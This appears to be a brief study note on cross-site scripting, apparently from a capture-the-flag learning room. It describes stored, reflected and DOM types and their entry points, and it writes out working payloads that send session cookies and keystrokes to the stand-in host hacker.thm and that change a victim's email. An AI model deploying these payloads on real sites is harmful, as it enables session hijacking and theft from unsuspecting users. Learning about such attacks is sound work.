Cross-site scripting (XSS)

On webserver that is not sanitizing user input, hacker could inject and execute malicious scripts.

Different types of XSS

Stored XSS

Change website for every user by saving script that runs on every page it is opened.

• twitter xss hack

Detection

You’ll need to test every possible point of entry where it seems data is stored and then shown back in areas that other users have access to, like:

• Comments on a blog
• User profile information
• Website Listings

Reflected XSS

Reflected XSS injects scripts into web pages that are reflected back to the user. Get data from server like ip or flag from files.

Detecting

Testing for possible entry points:

• URL Query String parameters
• URL File Path
• HTTP Headers (unlikely exploitable in practice).

DOM-Based XSS

TODO

Example Payloads

Full library of xxs payloads Collection of xss payloads

Detecting

• <script>alert(“Hello World”)</script> - popup
• <script>alert(window.location.hostname)</script> - hostname
• document.write - overwrite html

Exploiting

• keylogger - XSS keylogger
• Port Scanning

Types of XSS

• Session Stealing:
  • <script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>
• Key Logger:
  • <script>document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}</script>
• Business Logic:
  • <script>user.changeEmail('[email protected]');</script>